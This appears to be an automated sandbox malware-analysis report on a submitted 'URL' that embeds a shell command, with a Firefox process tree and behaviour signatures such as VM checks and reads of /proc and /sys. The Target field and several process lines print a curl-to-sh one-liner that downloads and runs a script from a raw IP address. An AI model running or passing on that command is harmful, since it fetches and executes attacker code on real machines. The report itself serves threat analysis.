Analysis

  • max time kernel
    43s
  • max time network
    128s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20250610-en
  • resource tags

    arch:amd64
    arch:i386
    image:ubuntu2404-amd64-20250610-en
    kernel:6.8.0-31-generic
    locale:en-us
    os:ubuntu-24.04-amd64
    system
  • submitted
    03/07/2025, 05:56

General

  • Target

    http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16

Score
6/10

Malware Config

Signatures

  • Checks hardware identifiers (DMI) 1 TTPs 1 IoCs

    Checks DMI information that indicates whether the system is a virtual machine.

  • Reads hardware information 1 TTPs 1 IoCs

    Accesses system information such as serial numbers, manufacturer names, etc.

  • Changes its process name 64 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 10 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 42 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 59 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

  • cURL User-Agent 11 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • /usr/bin/firefox
    firefox -new-tab "http://bash -c \"curl 158.51.126.131/zy.sh -o- | sh\";echo -n \"H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16"
    1⤵
      PID:2036
    • /usr/lib/firefox/firefox-bin
      firefox -new-tab "http://bash -c \"curl 158.51.126.131/zy.sh -o- | sh\";echo -n \"H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16"
      1⤵
      • Checks hardware identifiers (DMI)
      • Reads hardware information
      • Changes its process name
      • Checks CPU configuration
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:2036
      • /usr/lib/firefox/crashhelper
        /usr/lib/firefox/crashhelper 2036 9 /tmp/ 10 12
        2⤵
          PID:2050
        • /usr/local/sbin/dbus-launch
          dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
          2⤵
            PID:2054
          • /usr/local/bin/dbus-launch
            dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
            2⤵
              PID:2054
            • /usr/sbin/dbus-launch
              dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
              2⤵
                PID:2054
              • /usr/bin/dbus-launch
                dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                2⤵
                • Reads runtime system information
                PID:2054
                • /usr/bin/dbus-daemon
                  /usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session
                  3⤵
                  • Enumerates kernel/hardware configuration
                  • Reads runtime system information
                  PID:2056
                  • /usr/libexec/xdg-desktop-portal
                    /usr/libexec/xdg-desktop-portal
                    4⤵
                    • Reads runtime system information
                    PID:2106
                  • /usr/libexec/at-spi-bus-launcher
                    /usr/libexec/at-spi-bus-launcher
                    4⤵
                    • Reads runtime system information
                    PID:2109
                  • /usr/libexec/xdg-document-portal
                    /usr/libexec/xdg-document-portal
                    4⤵
                    • Reads runtime system information
                    PID:2126
                    • /usr/bin/fusermount3
                      fusermount3 -o "rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal" -- /root/.cache/doc
                      5⤵
                        PID:2140
                    • /usr/libexec/xdg-permission-store
                      /usr/libexec/xdg-permission-store
                      4⤵
                      • Reads runtime system information
                      PID:2133
                    • /usr/libexec/xdg-desktop-portal-gtk
                      /usr/libexec/xdg-desktop-portal-gtk
                      4⤵
                      • Reads runtime system information
                      PID:2145
                    • /usr/libexec/gvfsd
                      /usr/libexec/gvfsd
                      4⤵
                      • Reads runtime system information
                      PID:2150
                      • /usr/libexec/gvfsd-fuse
                        /usr/libexec/gvfsd-fuse /root/.gvfs -f
                        5⤵
                        • Reads runtime system information
                        PID:2156
                • /usr/local/sbin/dbus-launch
                  dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                  2⤵
                    PID:2060
                  • /usr/local/bin/dbus-launch
                    dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                    2⤵
                      PID:2060
                    • /usr/sbin/dbus-launch
                      dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                      2⤵
                        PID:2060
                      • /usr/bin/dbus-launch
                        dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                        2⤵
                          PID:2060
                        • /usr/lib/firefox/glxtest
                          /usr/lib/firefox/glxtest -f 17
                          2⤵
                          • Changes its process name
                          • Reads CPU attributes
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:2062
                        • /usr/local/sbin/dbus-launch
                          dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                          2⤵
                            PID:2069
                          • /usr/local/bin/dbus-launch
                            dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                            2⤵
                              PID:2069
                            • /usr/sbin/dbus-launch
                              dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                              2⤵
                                PID:2069
                              • /usr/bin/dbus-launch
                                dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                                2⤵
                                  PID:2069
                                • /usr/lib/firefox/firefox-bin
                                  /usr/lib/firefox/firefox-bin -contentproc -ipcHandle 0 -initialChannelId "{0cd4c6bc-69f1-486e-bc88-aabae6e45197}" -parentPid 2036 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser 1 forkserver
                                  2⤵
                                  • Reads CPU attributes
                                  • Enumerates kernel/hardware configuration
                                  • Reads runtime system information
                                  PID:2098

Network

MITRE ATT&CK Enterprise v16


Downloads